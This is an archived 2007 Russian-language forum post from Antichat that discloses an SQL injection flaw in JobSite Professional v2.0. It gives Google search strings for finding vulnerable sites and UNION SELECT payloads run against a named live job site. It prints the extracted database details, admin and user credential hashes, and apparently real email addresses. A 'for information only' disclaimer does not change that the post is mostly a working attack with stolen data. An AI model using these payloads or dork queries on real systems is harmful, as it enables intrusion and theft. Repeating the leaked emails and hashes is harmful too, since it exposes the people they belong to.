ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

SQL-inj в JobSite Professional v2.0
  #1  
Старый 08.11.2007, 18:51
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию SQL-inj в JobSite Professional v2.0

Программа: JobSite Professional v2.0
Цитата:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием File.php?. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Код:
http://[site]/File.php?id=[sql]
Поиск в Гугл:
inurl:index.php?page=en_jobseekers - английская версия
inurl:index.php?page=fr_Candidats - французская версия
Пример:
_www.milkround.ie
Cмотрим версию мускула, пользователя, базу:
Код:
_http://www.milkround.ie/file.php?id=-1+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8/*
5.0.24a-standard:jobs_portal@localhost:jobs_portal
Смотрим названия таблиц, меняя лимит:
Код:
_http://www.milkround.ie/file.php?id=-1+union+select+1,2,table_name,4,5,6,7,8+from+information_schema.tables+limit+1,1/*
всего 106 таблиц.
Интересные таблицы:
Код:
_http://www.milkround.ie/file.php?id=-1+UNION+SELECT+1,2,CONCAT(USERNAME,0x3a,PASSWORD),4,5,6,7,8+FROM+websiteadmin_admin_users/*
_http://www.milkround.ie/file.php?id=-1+UNION+SELECT+1,2,CONCAT(USERNAME,0x3a,PASSWORD),4,5,6,7,8+FROM+websiteadmin_ext_jobseekers/*
_http://www.milkround.ie/file.php?id=-1+UNION+SELECT+1,2,CONCAT(USERNAME,0x3a,PASSWORD),4,5,6,7,8+FROM+websiteadmin_ext_employers/*
administrator:61ff6c39c7925044f061566f4c21b267
scottbrien@hotmail.com:18859128760e989630b7d2073db 3f1ba
lizodonovan@eircom.net:cb0be83e6cb9e65c62da133391b 77a49

PS. Пример использования уязвимости, представлен только для ознакомления, все незаконные действия совершаемые Вами могут быть уголовно наказуемы и вся ответственность за неправоменрные действия лежит на вас.
AUTHOR : (нашёл уязвимость) ZynbER, пример мой ;-)
www.milw0rm.com

Последний раз редактировалось -=lebed=-; 08.11.2007 в 19:01..
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ